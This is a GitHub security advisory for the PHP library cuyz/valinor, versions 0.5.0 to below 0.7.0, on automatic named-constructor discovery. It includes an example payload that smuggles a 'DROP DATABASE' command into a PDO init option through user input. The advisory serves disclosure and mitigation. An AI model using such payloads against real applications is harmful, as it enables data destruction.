Skip to content

Automatic named constructor discovery in Valinor

High severity GitHub Reviewed Published Mar 24, 2022 in CuyZ/Valinor • Updated Jan 11, 2023

Package

composer cuyz/valinor (Composer)

Affected versions

>= 0.5.0, < 0.7.0

Patched versions

0.7.0

Description

Design issue - automatic constructor discovery

The issue arises when upgrading from cuyz/valinor:0.3.0 to a newer system on an existing application, which broke due to the wrong constructor being picked.

Still, a bigger security concern is problematic, and it is akin to rails/rails#5228.

Example exploit

Take following DTO example:

final class UserDTO
{
    public function __construct(
        public int $id,
        public string $name
    ) {}
    public static function fromDb(
        PDO $connection,
        int $id
    ): self { /* ... code to fetch the DTO here ... */ }
}

There is nothing inherently unsafe about the above UserDTO, but when mixed with cuyz/valinor:^0.5.0 ( specifically CuyZ/Valinor@718d3c1 ), it is an explosive mix:

// this could be coming from user input:
$maliciousPayload = [
    'connection' => [
      'dsn' => 'mysql:host=some-host;database=some-database',
      'username' => 'root',
      'password' => 'root',
      'options' => [
        // PDO::MYSQL_ATTR_INIT_COMMAND === 1002
        1002 => 'DROP DATABASE all-the-moneys'
      ]
    ],
    'id' => 123,
];

$treeMapper->map(
  UserDTO::class,
  $maliciousPayload
); // your DB is gone :D

The above payload is represented in PHP form, but may as well be input JSON, HTML or x-form-urlencoded.

Mitigation

Version 0.7.0 contains a patch for this issue.

Automatic named constructor resolution should be disabled - only explicitly mapped named constructors should be used/discovered.

References

@romm romm published to CuyZ/Valinor Mar 24, 2022
Published to the GitHub Advisory Database Apr 1, 2022
Reviewed Apr 1, 2022
Last updated Jan 11, 2023

Severity

High

Weaknesses

No CWEs

CVE ID

No known CVE

GHSA ID

GHSA-xhr8-mpwq-2rr2

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.